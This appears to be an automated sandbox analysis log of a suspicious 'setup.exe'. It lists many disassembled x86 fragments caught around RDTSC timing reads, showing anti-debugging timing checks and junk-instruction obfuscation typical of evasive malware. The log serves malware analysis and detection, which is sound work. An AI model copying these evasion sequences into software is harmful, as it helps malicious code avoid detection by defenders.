Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C5FB8 second address: 3C6048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F47D8E3B0A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F47D8E3B0A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007F47D8E3B0B7h 0x00000045 jmp 00007F47D8E3B0B4h 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122DB73Fh], edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C6048 second address: 3C604E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C61DE second address: 3C61FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e js 00007F47D8E3B0A6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F47D8E3B0A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C61FB second address: 3C61FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C802B second address: 3C8035 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C718C second address: 3C7192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C903D second address: 3C9078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E3B0B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F47D8E3B0B8h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C9078 second address: 3C912F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F47D8E48268h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bl, 91h 0x00000026 xor di, 03CBh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F47D8E48268h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov di, D0D5h 0x0000004b xor ebx, 6BC0166Bh 0x00000051 mov edi, 6E2E0A33h 0x00000056 push 00000000h 0x00000058 call 00007F47D8E4826Ah 0x0000005d mov di, 9A30h 0x00000061 pop ebx 0x00000062 jl 00007F47D8E48274h 0x00000068 jmp 00007F47D8E4826Eh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 pushad 0x00000072 popad 0x00000073 jmp 00007F47D8E48277h 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C912F second address: 3C9135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3C9135 second address: 3C9139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CB00E second address: 3CB0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F47D8E3B0B3h 0x00000010 jmp 00007F47D8E3B0ADh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F47D8E3B0A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24DDh], edi 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 xor dword ptr [ebp+122D2CD2h], edx 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F47D8E3B0A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c and di, 840Bh 0x00000061 mov ebx, dword ptr [ebp+122D38ACh] 0x00000067 mov ebx, dword ptr [ebp+122D3854h] 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 pop edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CB0A9 second address: 3CB0AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CB0AE second address: 3CB0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD17B second address: 3CD17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD17F second address: 3CD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD183 second address: 3CD195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F47D8E48268h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD195 second address: 3CD1FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47D8E3B0B0h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D295Ch] 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D28BBh], edi 0x00000034 push 00000000h 0x00000036 call 00007F47D8E3B0ACh 0x0000003b pop ebx 0x0000003c jnp 00007F47D8E3B0A9h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD1FB second address: 3CD20F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD20F second address: 3CD23A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD23A second address: 3CD240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CB29F second address: 3CB353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F47D8E3B0ACh 0x0000000b popad 0x0000000c nop 0x0000000d sub edi, 7EE2A94Fh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov edi, dword ptr [ebp+122D2A24h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push ecx 0x00000028 mov edi, dword ptr [ebp+1248495Bh] 0x0000002e pop ebx 0x0000002f mov bx, 6713h 0x00000033 mov eax, dword ptr [ebp+122D0311h] 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F47D8E3B0A8h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push eax 0x00000058 call 00007F47D8E3B0A8h 0x0000005d pop eax 0x0000005e mov dword ptr [esp+04h], eax 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc eax 0x0000006b push eax 0x0000006c ret 0x0000006d pop eax 0x0000006e ret 0x0000006f or bx, 7C80h 0x00000074 mov ebx, dword ptr [ebp+122D2A2Ch] 0x0000007a nop 0x0000007b push eax 0x0000007c jmp 00007F47D8E3B0B5h 0x00000081 pop eax 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007F47D8E3B0AAh 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CB353 second address: 3CB35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CC2FF second address: 3CC3A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F47D8E3B0A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push edi 0x00000029 mov ebx, 52BAEEE0h 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 xor edi, 615BE237h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F47D8E3B0A8h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d mov ebx, dword ptr [ebp+1248493Fh] 0x00000063 mov ebx, 400639D1h 0x00000068 mov eax, dword ptr [ebp+122D0EFDh] 0x0000006e mov dword ptr [ebp+1247ABC1h], ecx 0x00000074 push FFFFFFFFh 0x00000076 sub edi, dword ptr [ebp+1247A6F6h] 0x0000007c push eax 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F47D8E3B0B5h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CD36C second address: 3CD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F47D8E4826Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D0090 second address: 3D0095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CF332 second address: 3CF345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3CF345 second address: 3CF349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D0095 second address: 3D00DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F47D8E48268h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov edi, dword ptr [ebp+122D298Ah] 0x0000002e push 00000000h 0x00000030 movsx ebx, dx 0x00000033 and ebx, dword ptr [ebp+122D3688h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jno 00007F47D8E48266h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D00DD second address: 3D00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D0F28 second address: 3D0F70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add bh, FFFFFFBFh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F47D8E48268h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, esi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c add edi, dword ptr [ebp+122D3970h] 0x00000032 mov dword ptr [ebp+12484427h], edi 0x00000038 popad 0x00000039 mov ebx, 6C0890A6h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D0F70 second address: 3D0F7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D8E04 second address: 3D8E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 jmp 00007F47D8E48272h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3D8E2B second address: 3D8E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEE2E second address: 3DEE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEE32 second address: 3DEE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F47D8E3B0AAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEE51 second address: 3DEE56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEE56 second address: 3DEE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEF50 second address: 3DEF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3DEF54 second address: 3DEF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F47D8E3B0A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E44DD second address: 3E4504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48278h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F47D8E48266h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4504 second address: 3E4510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F47D8E3B0A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4510 second address: 3E4518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4518 second address: 3E4523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4523 second address: 3E4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4527 second address: 3E452B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E370C second address: 3E3710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E3869 second address: 3E386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E386D second address: 3E3882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E39A9 second address: 3E39B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E39B3 second address: 3E39CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48275h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E39CF second address: 3E39E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E3CDB second address: 3E3CE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E3E6E second address: 3E3E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E3FF5 second address: 3E3FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E3FF9 second address: 3E400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E400A second address: 3E4027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48278h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4027 second address: 3E402D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E402D second address: 3E4033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E4175 second address: 3E418F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007F47D8E3B0A8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E418F second address: 3E419B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F47D8E48266h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E419B second address: 3E419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E8F08 second address: 3E8F1C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F47D8E4826Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 36CABC second address: 36CAC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E7D32 second address: 3E7D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jmp 00007F47D8E4826Dh 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E7D48 second address: 3E7D6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F47D8E3B0A6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3E7D6A second address: 3E7D6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BF410 second address: 3BF42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BF42A second address: 399C08 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F47D8E48268h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F47D8E48274h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F47D8E48268h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov edx, 7F0CDDD1h 0x00000033 lea eax, dword ptr [ebp+124941F6h] 0x00000039 nop 0x0000003a push edi 0x0000003b jmp 00007F47D8E48273h 0x00000040 pop edi 0x00000041 push eax 0x00000042 push ecx 0x00000043 push esi 0x00000044 jc 00007F47D8E48266h 0x0000004a pop esi 0x0000004b pop ecx 0x0000004c nop 0x0000004d mov ch, bh 0x0000004f sbb edi, 0370D000h 0x00000055 call dword ptr [ebp+122D2C7Dh] 0x0000005b pushad 0x0000005c jmp 00007F47D8E48273h 0x00000061 jmp 00007F47D8E48279h 0x00000066 push ebx 0x00000067 jmp 00007F47D8E48270h 0x0000006c jmp 00007F47D8E48270h 0x00000071 pop ebx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFAFB second address: 3BFB00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 3BFB00 second address: 3BFB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F47D8E48268h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
